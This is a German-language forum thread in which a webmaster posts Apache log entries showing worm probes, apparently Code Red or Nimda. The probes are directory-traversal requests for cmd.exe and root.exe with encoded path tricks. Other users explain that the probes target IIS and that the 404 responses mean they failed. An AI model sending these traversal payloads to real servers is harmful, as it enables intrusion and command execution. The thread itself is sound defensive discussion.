hackversuche?

  • hi zäme


    ich hatte auf meinem webserver (apache), trotz firewall öfters solche versuchte zugriffe (auszug aus dem logfile):


    203.132.142.13 - - [23/Aug/2002:14:00:05 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:06 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:07 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:08 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:09 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:10 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:14 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:15 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:16 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:17 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:19 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:20 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:21 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:31 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:32 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
    203.132.142.13 - - [23/Aug/2002:14:00:33 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"


    sie kamen aber von den unterschiedlichsten ips. das ist jetzt einfach so ein versuch, von dem es etwa 5 gab.


    was hat das zu bedeuten? was wollte er da ausführen? wie kann ich mich dagegen schützen?


    greetz ganto


    "Computer games don't affect kids, I mean if Pacman affected us as kids, we'd all run around in a darkened room munching pills and listening to repetitive music."


    Kristian Wilson

  • sieht mir schwer nach CodeRed (?) aus.. aber dank Apache mussu nicht angst haben..

    Signatur sein ist doof, ich will ein Avatar werden, wenn ich gross bin!

  • wow, wie man da wieder dazulernt, auf das wäre ich jetzt ehrlichgesagt nicht gekommen. :))


    thanks


    "Computer games don't affect kids, I mean if Pacman affected us as kids, we'd all run around in a darkened room munching pills and listening to repetitive music."


    Kristian Wilson

  • solange da hinten 404 steht hast du nix zu befürchten.


    mein Server Log ist auch voll davon...

    A fine is a tax for doing wrong.
    A tax is a fine for doing well.

  • Also wenns wirklich der CRII ist, kann er ja nichts dafür... oder fast nichts... ausser dass er was gegen ihn tun sollte.


    Laut Tracert ist er in NewYork...

    In Lyss gibts nen neuen Club ==> http://www.opposition-lyss.ch


    "Speed has never killed anyone, suddenly becoming stationary... That's what gets you. "- JEREMY CLARKSON!


    ''She said she wanted to fulfill every single one of my fantasies. I made a list. Had to type it myself. My assistant threatened to quit.'' - DENNY CRANE!

  • update dein apache und dann kannst du absolut sorgenfrei schlafen ;)

    Bremsen macht die Felge dreckig!
    Mitglied der PC4all Schlägertruppe!!!
    DutcheKa (04:41 PM) : aye, skipper ;)
    ...Weasel stopped DLS spamming-spree!
    "National sein heisst nicht, fremde Völker hassen, sondern das eigene Volk lieben." Peter Rosegger (1843 - 1918)
    Unbent, Unbowed, Unbroken! ©Hammerfall 2005 - Pain is temporary, Pride is forever ©? - ONE SHALL STAND. ONE SHALL FALL.©The Transformers 1984


    Meine Ricardo-Auktionen!

  • diese attacken sind normal. hab genau die selben meldungen. im inet ist man halt dauernd unter beschuss :D
    wie bereits erwähnt, solange 404 kommt, kann er nix machen. bei mir kann er noch lange root.exe oder cmd.exe auf einer linux maschine suchen :stupid:stupid

  • ähm CR? ich hab verpasst wie das ding funktioniert... WOHER "weiss" das virus die IP's??? führt einfach bei zufällig zusammengesetzten ips portscan 80 durch oder wie? ?(

  • Der scannt die IPs.


    Wenn du solche meldungen nicht mehr im Log haben willst, leg Apache auf Port 81 oder so. Hab ich bei mir so zwangsmässig wegen meinem Provider, und ich hab ein sauberes log.
    Die Attacken auf cmd.exe und so sind eh auf IIS abgerichtet.... Da musst du unter Apache keine Angst haben. Wenn du doch auf sicher gehen willst: Linux Server....


    |---> it MUST be a spoon! <---|